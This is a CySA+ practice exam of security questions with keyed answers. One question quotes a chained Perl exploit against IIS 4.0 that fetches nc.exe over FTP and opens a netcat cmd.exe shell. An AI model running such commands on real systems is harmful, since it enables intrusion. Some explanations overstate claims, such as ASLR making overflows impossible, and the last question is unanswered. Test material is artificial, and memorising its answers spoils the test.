CompTIA CySA+ Practice Test Dion
When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture? A. -nn B. -e C. -X D. -n
B. -e The -e option includes the ethernet header during packet capture. The -n flag will show the IP addresses in numeric form. The -nn option shows IP addresses and ports in numeric format. The -X option will capture the packet's payload in hex and ASCII formats.
What type of malware is designed to be difficult for malware analysts to reverse engineer? A. Rootkit B. Armored virus C. Trojan D. Logic bomb
B. Armored virus Armored viruses are a type of virus that use various techniques to protect it from being reverse engineered. This includes changing its code during execution and encrypting its payloads.
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? A. MAC spoofing B. DNS poisoning C. DNS brute-forcing D. ARP spoofing
B. DNS poisoning DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the command "strcpy" is being used in the application. Which of the following provides is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow an integer overflow to occur; you should rewrite the entire system in Java B. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow C. strcpy could allow a buffer overflow to occur; you should rewrite the entire system in Java D. strcpy could allow an integer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow
B. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow C and C++ contain built-in functions such as strcpy that do not provide a default mechanism for checking if data will overwrite the boundaries of a buffer. The developer must identify such insecure functions and ensure that every call made to them by the program is performed securely. Many development projects use higher-level languages, such as Java, Python, and PHP. These interpreted languages will halt execution if an overflow condition is detected. However, changing languages may be infeasible in an environment that relies heavily on legacy code. By ensuring that the operating system supports ASLR, you can make it impossible for a buffer overflow to work by randomizing where objects in memory are being loaded. Rewriting the source code would be highly desirable but could be costly, time-consuming, and would not be an immediate mitigation to this problem. The strcpy function (which is short for String copy) does not work on integers, and it only works on strings. As strcpy does not check for boundary conditions, buffer overflows are certainly possible using this deprecated method.
A cybersecurity analyst is working at a college that wants to increase its network's security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of server-based and agent-based scanning engines B. Combination of cloud-based and server-based scanning engines C. Active scanning engine installed on the enterprise console D. Passive scanning engine located at the core of the network infrastructure
C. Active scanning engine installed on the enterprise console
Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST? A. Host-based firewall B. Intrusion detection system C. Application allow list D. Anti-malware solution
C. Application allow list Application allow list will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus.
Fail to Pass Systems has just become the latest victim in a large-scale data breach by an APT. Your initial investigation confirms a massive exfiltration of customer data has occurred. Which of the following actions do you recommend to the CEO of Fail to Pass Systems in handling this data breach? A. Provide a statement to the press that minimizes the scope of the breach B. Conduct a 'hack-back' of the attacker to retrieve the stolen information C. Purchase a cyber insurance policy, alter the date of the incident in the log files, and file an insurance claim D. Conduct notification to all affected customers within 72 hours of the discovery of the breach
D. Conduct notification to all affected customers within 72 hours of the discovery of the breach Generally speaking, most laws require notification within 72 hours, such as the GDPR
Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting? A. Scheduled vulnerability scanning B. Continuous vulnerability scanning C. On-demand vulnerability scanning D. Agent-based monitoring
D. Agent-based monitoring An agent-based monitoring solution would be the best choice to meet these requirements. Agent-based monitoring provides more details of the configuration settings for a system and can provide an internal perspective. While vulnerability scans can give you a snapshot of a system's status at a certain time, they will not remain current and accurate without continual rescanning.
What information should be recorded on a chain of custody form during a forensic investigation? A. The list of former owners/operators of the workstation involved in the investigation B. The law enforcement agent who was first on the scene C. The list of individuals who made contact with files leading to the investigation D. Any individual who worked with evidence during the investigation
D. Any individual who worked with evidence during the investigation Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence. Depending on the organization's procedures, manipulation of evidence may require an additional person to act as a witness to verify whatever action is being taken. While the chain of custody would record who initially collected the evidence, it does not have to record who was the first person on the scene (if that person didn't collect the evidence). The other options presented by the question are all good pieces of information to record in your notes, but it is not required to be on the chain of custody form.
Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh? A. Add a network IPS rule to block root logins B. Add root to the sudoers group C. Add an iptables rule blocking root logins D. Change sshd_config to deny root login
D. Change sshd_config to deny root login Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn't know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won't help either since the sudoers group allows users to login as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence of a backdoor related to a Linux service? A. /etc/xinetd.conf B. /etc/passwd C. $HOME/.ssh/ D. /etc/shadow
A. /etc/xinetd.conf Linux services are started by xinetd, but some new versions use sytemctl. Therefore, the /etc/xinetd.conf should be analyzed for any evidence of a backdoor being started as part of the Linux services. Both the /etc/passwd and /etc/shadow files contain configurations specifically associated with individual user accounts. The /home/.ssh directory contains SSH keys for SSH-based logins.
Consider the following REGEX search string: \b(25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\. (25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\. (25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\. (25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\b Which of the following strings would NOT be included in the output of this search? A. 37.259.129.207 B. 1.2.3.4 C. 205.255.255.001 D. 001.02.3.40
A. 37.259.129.207 The \b delimiter indicates that we are looking for whole words for the complete string. The REGEX is made up of four identical repeating strings, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.". For now, let us refer to these octets, such as the ones used in internet protocol version 4 addresses. Each octet will allow the combination of 25[0-5] OR (|) 2[0-4][9-] OR numbers 00-99 is preceded by (?) a 0 or 1, or just a single number followed by a ".". Since the period is treated as a special character in a REGEX operator, the escape character (\) is required to enable the symbol to act as a dot or period in the output. This sequence repeats four times, allowing for all variations of normal IP addresses to be entered for values 0-255. Since 259 is outside the range of 255, this is rejected. More specifically, character strings starting with 25 must end with a number between 0 and 5 (25[0-5]). Therefore, 259 would be rejected. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answer first and see that they all look like IP addresses. Remember, grep and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.107 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: Based on the output above, which of the following is true? A. An XML External Entity (XXE) vulnerability has been exploited and the attacker may have downloaded the passwd file B. There is no concern since passwd does not contain any system passwords C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used D. The application is using parameterized queries to prevent XML injections
A. An XML External Entity (XXE) vulnerability has been exploited and the attacker may have downloaded the passwd file
Which mobile device strategy is most likely to introduce vulnerable devices to a corporate network? A. BYOD B. CYOD C. COPE D. MDM
A. BYOD The BYOD (bring your own device) strategy opens a network to many vulnerabilities. People can bring their personal devices to the corporate network, and their devices may contain vulnerabilities that could be allowed to roam free on a corporate network. COPE (company-owned/personally enabled) means that the company provides the users with a smartphone primarily for work use, but basic functions such as voice calls, messaging, and personal applications are allowed, with some controls on usage and flexibility. With CYOD, the user can choose which device they wish to use from a small selection of devices approved by the company. The company then buys, procures, and secures the device for the user. The MDM is a mobile device management system that gives centralized control over COPE company-owned personally enabled devices.
You have received a laptop from a user who recently left the company. You went to the terminal in the operating system and typed 'history' into the prompt and see the following: > for i in seq 255; -c 1 10.1.0.$i; done Which of the following best describes what actions were performed by this line of code? A. Conducted a ping sweep of the subnet B. Attempted to conduct a SYN scan on the network C. Sequentially sent 255 ping packets to every host on the subnet D. Conducted a sequential ICMP echo reply to the subnet
A. Conducted a ping sweep of the subnet This code is performing a ping sweep of the subnet 10.1.0.0/24. The code states that for every number in the sequence from 1 to 255, conduct a ping to 10.1.0.x, where x is the number from 1 to 255. When it completes this sequence, it is to return to the terminal prompt (done). The ping command uses an echo request and then receives an echo reply from the ping's target. A ping sweep does not use an SYN scan, which would require the use of a tool like nmap or hping.
During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance's operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability? A. Contact the vendor to provide an update or to remediate the vulnerability B. Try to gain access to the underlying operating system and install the patch C. Mark the identified vulnerability as a false positive D. Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability
A. Contact the vendor to provide an update or to remediate the vulnerability
You are deploying OpenSSL in your organization and must select a cipher suite. Which of the following ciphers should NOT be used with OpenSSL? A. DES B. RSA C. AES D. ECC
A. DES DES is outdated and should not be used for any modern applications. The AES, RSA, and ECC are all current secure alternatives that could be used with OpenSSL. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
In which phase of the security intelligence cycle is published information relevant to security issues provided to those who need to act on that information? A. Collection B. Dissemination C. Feedback D. Analysis
B. Dissemination The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM).
Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext? A. SIEM event log monitoring B. Full packet capture C. Net flow capture D. Software design documentation review
B. Full packet capture Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent. A net flow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent. Still, it will not reveal anything about the content itself since it only analyzes the metadata for each packet crossing the network.
Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application: https://www.whamiedyne.com/app/accountInfo?acct=12345 You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following type of vulnerabilities or threats have you discovered? A. Insecure direct object reference B. XML injection C. Race condition D. SQL injection
A. Insecure direct object reference This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. An attacker can modify one or more of these four basic functions in a SQL injection attack by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the developer's order and timing, which is not the case in this scenario.
Fail to Pass Systems has suffered a data breach. Your analysis of suspicious log activity traced the source of the data breach to an employee in the accounting department's personally-owned smartphone connected to the company's wireless network. The smartphone has been isolated from the network now, but the employee refuses to allow you to image their smartphone to complete your investigation forensically. According to the employee, the company's BYOD policy does not require her to give you her device, and it is an invasion of their privacy. Which of the following phases of the incident response process is at fault for creating this situation? A. Preparation phase B. Containment phase C. Detection and analysis phase D. Eradication and recovery phase
A. Preparation phase As part of the preparation phase, obtaining authorization to seize devices (including personally owned electronics) should have been made clear and consented to by all employees. If the proper requirements were placed into the BYOD policy before the incident occurred, this would have prevented this situation.
Which of the following roles should coordinate communications with the media during an incident response? A. Public relations B. Human resources C. Senior leadership D. System administrators
A. Public relations Public relations staff should be included in incident response teams to coordinate communications with the general public and the media to manage any negative publicity from a serious incident. Information about the incident should be released in a controlled way when appropriate through known press and external public relations agencies. Senior leadership should be focused on how the incident affects their departments or functional areas to make the best decisions. The senior leadership should not talk to the media without guidance from the public relations team. System administrators are part of the incident response team since they know the network's normal baseline behavior and its system better than anyone else. System administrators should not talk to the media during an incident response. Human resources are part of the incident response team to appropriately contact any suspected insider threats and ensure no breaches of employment law or employment contracts are made.
Dion Training wants to require students to log on using multifactor authentication to increase the security of the authorization and authentication process. Currently, students log in to diontraining.com using a username and password. What proposed solution would best meet the goal of enabling multifactor authentication for the student login process? A. Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password B. Require students to choose an image to serve as a secondary password after logon C. Require students to enter a cognitive password requirement (such as 'What is your dog's name?') D. Require students to create a unique pin that is entered after their username and password are accepted
A. Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server's backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE) A. Require two-factor authentication for access to the application B. Change the username and default password C. Require an alphanumeric passphrase for the application's default password D. Create an allow list for the specific IP blocks that use this application E. Conduct a penetration test against the organization's IP space F. Rename the URL to a more obscure name
A. Require two-factor authentication for access to the application B. Change the username and default password D. Create an allow list for the specific IP blocks that use this application First, you should change the username and default password since using default credentials is extremely insecure. Second, you should implement an allow list for any specific IP blocks with access to this application's administrative web frontend since it should only be a few system administrators and power users. Next, you should implement two-factor authentication to access the application since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application's default password. Since it is a default password, you can not change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization's IP space to identify other vulnerabilities, it will not positively affect remediating this identified vulnerability.
You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization's operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system? A. Ask the CEO for a list of the critical systems B. Review the asset inventory and BCP C. Conduct a nmap scan of the network to determine the OS of each system D. Scope the scan based on IP subnets
B. Review the asset inventory and BCP you can review the business continuity plan (BCP) since this will provide the organization's plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations.
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Technical architecture B. Business architecture C. Data architecture D. Applications architecture
A. Technical architecture TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization's approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
You are attempting to prioritize your vulnerability scans based on the data's criticality. This will be determined by the asset value of the data contained in each system. Which of the following would be the most appropriate metric to use in this prioritization? A. The type of data processed by the system B. The cost of hardware replacement of the system C. The depreciated hardware cost of the system D. The cost of acquisition of the system
A. The type of data processed by the system
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? A. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b B. \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b C. \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b D. \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b
A. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parenthesis and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square braces indicates that any of the letters contained in the square braces are matching criteria. Using the + operator indicates an allowance for one more instance of the preceding element. In all cases, the period must have an escape (\) sequence preceding it as the period is a reserved operator internal to REGEX.
Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont's discovery, what type of attack might occur? A. Cross-site scripting B. Buffer overflow C. SQL injection D. Malicious logic
B. Buffer overflow A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Programs should use the variable size validation before writing the data to memory to ensure that the variable can fit into the buffer to prevent this type of attack.
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. SMTP B. SNMP C. MIB D. NetFlow
B. SNMP Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device's status, including CPU and memory utilization, and many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.
A penetration tester discovered a legacy web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands: system("perl msadc.p1 -h $host -C \"echo $user>>tempfile\" "); system("perl msadc.p1 -h $host -C \"echo $pass>>tempfile\" "); system("perl msadc.p1 -h $host -C \"echo bin>>tempfile\" "); system("perl msadc.p1 -h $host -C \"echo get nc.exe>>tempfile\" "); system("perl msadc.p1 -h $host -C \"echo get hacked.html>>tempfile\" "); ("perl msadc.pl -h $host -C \"echo quit>>tempfile\" "); system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\" "); $o=; print "Opening FTP connection...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\" "); Which exploit type is indicated by this script? A. Buffer overflow exploit B. Chained exploit C. SQL injection exploit D. Denial of Service exploit
B. Chained exploit The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.
In which phase of the security intelligence cycle is information from several different sources aggregated into useful repositories? A. Dissemination B. Collection C. Feedback D. Analysis
B. Collection The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers' and intelligence consumers' input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first? A. Conduct a Nessus scan of the FIREFLY server B. Conduct a data criticality and prioritization analysis C. Hardening the DEV_SERVER7 server D. Logically isolate the PAYROLL_DB server from the production network
B. Conduct a data criticality and prioritization analysis While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn't contain their credit card processing systems that would be a more lucrative target for APT 38 than the PAYROLL_DB. The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don't know which data they should focus on protecting or where the attacker is currently.
Following a root cause analysis of an edge router's unexpected failure, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue? A. Verify that all routers are patched to the latest release B. Conduct secure supply chain management training C. Ensure all anti-virus signatures are up to date D. Increase network vulnerability scan frequency
B. Conduct secure supply chain management training Anti-counterfeit training is part of the NIST 800-53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network. They are unlikely to reliably detect a counterfeit item or prevent its introduction into the organization's supply chain. Training on detection methodologies (i.e., simple visual inspections) and training for acquisition personnel will better prevent recurrences
You are a security investigator at a high-security installation that houses significant amounts of valuable intellectual property. You are investigating the utilization of George's credentials and are trying to determine if his credentials were compromised or if he is an insider threat. In the break room, you overhear George telling a coworker that he believes he is the target of an ongoing investigation. Which of the following step in the preparation phase of the incident response was likely missed? A. Developing a proper incident response form B. Development of a communication plan C. Conduct background screenings on all applicants D. Creating a call list or escalation list
B. Development of a communication plan An established and agreed-upon communication plan, which may also include a non-disclosure agreement, should be put in place to prevent the targets of ongoing insider threat investigations from becoming aware of it. Even if it was later determined that George was innocent, the knowledge that he was being investigated could be damaging to both him and the company. If he was an insider threat who now suspects he is under investigation, he could take steps to cover his tracks or conduct destructive action. While background screenings may prevent some people from becoming insiders, it would not prevent the unauthorized disclosure of information concerning the investigation. A call list/escalation list will help manage this kind of problem and keep the right people informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a proper incident response form may include guidance for communication but would have been orchestrated as part of a larger communications plan that detailed the proper channels to use.
Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if any of the Dion Training employees use the same Ethernet port in the conference room, they should access Dion Training's secure internal network. Which of the following technologies would allow you to configure this port and support both requirements? A. MAC filtering B. Implement NAC C. Configure a SIEM D. Create an ACL to allow access
B. Implement NAC Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets and provide them with access to the secure internal network. NAC could also determine unknown machines (assumed to be those of CompTIA employees) and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define what ports, protocols, or IP addresses the ethernet port could be utilized. Still, it would be unable to distinguish between a Dion Training employee's laptop and a CompTIA employee's laptop like a NAC implementation could.
You received an incident response report indicating a piece of malware was introduced into the company's network through a remote workstation connected to the company's servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again? A. MAC filtering B. NAC C. ACL D. SPF
B. NAC Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company's networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forging sender addresses during email delivery.
A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results: # nmap 192.168.1.45 Starting NMAP 7.60 at 2020-06-12 21:23:15 NMAP scan report for 192.168.1.45 Host is up (0.78s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:0C:29:18:6B:D8 Which of the following operating systems is most likely used by the host? A. Linux server B. Networked printer C. Windows server D. Windows workstation
B. Networked printer Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, 445 are found, this is usually a good indication of a Windows file server. Port such as FTP, telnet, SMTP, and http is used by both Windows and Linux servers; therefore, they are not as helpful to indicate which operating system is in use by the host.
Which of the following options places the correct phases of the Software Development Lifecycle's waterfall method in the correct order? A. Planning, requirements analysis, design, implementation, deployment, testing, maintenance B. Planning, requirements analysis, design, implementation, testing, deployment, and maintenance C. Requirements analysis, planning, design, implementation, testing, deployment, and maintenance D. Requirements analysis, planning, design, implementation, deployment, testing, maintenance
B. Planning, requirements analysis, design, implementation, testing, deployment, and maintenance The software development lifecycle (SDLC) can be conducted using waterfall or agile methods. The waterfall method moves through seven phases: planning, requirements, design, implementation, testing, deployment, and maintenance. Planning involves training the developers and testers in security issues, acquiring security analysis tools, and ensuring the development environment's security. Requirements analysis is used to determine security and privacy needs in terms of data processing and access controls. Design identifies threats and controls or secure coding practices to meet the requirements. Implementation performs known environment source code analysis and code reviews to identify and resolve vulnerabilities. Testing performs known or unknown environment testing to test for vulnerabilities in the published application and its publication environment. Deployment installs and operates the software packages and best practice configuration guides. Maintenance involves ongoing security monitoring and incident response procedures, patch development and management, and other security controls. For a question like this on the real certification exam, you may be asked to drag and drop the seven steps into the proper order instead of receiving this as a multiple-choice question.
Which of the following is the biggest advantage of using Agile software development? A. Its structured and phase-oriented approach ensures that customer requirements are rigorously defined before development begins B. Reacts quickly to changing customer requirements since it allows all phases of software development to run in parallel C. Its inherent agility allows developers to maintain focus on the overall goals of the project D. It can produce better, more secure, and more efficient code
B. Reacts quickly to changing customer requirements since it allows all phases of software development to run in parallel
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A. NIDS B. Segmentation C. Patching D. Disabling unused services
B. Segmentation D. Disabling unused services Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.
Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically? A. Shutdown the virtual machine off and make a forensic copy of its disk image B. Suspend the machine and copy the contents of the directory it resides in C. Perform a live acquisition of the virtual machine's memory D. Suspend the machine and make a forensic copy of the drive it resides on
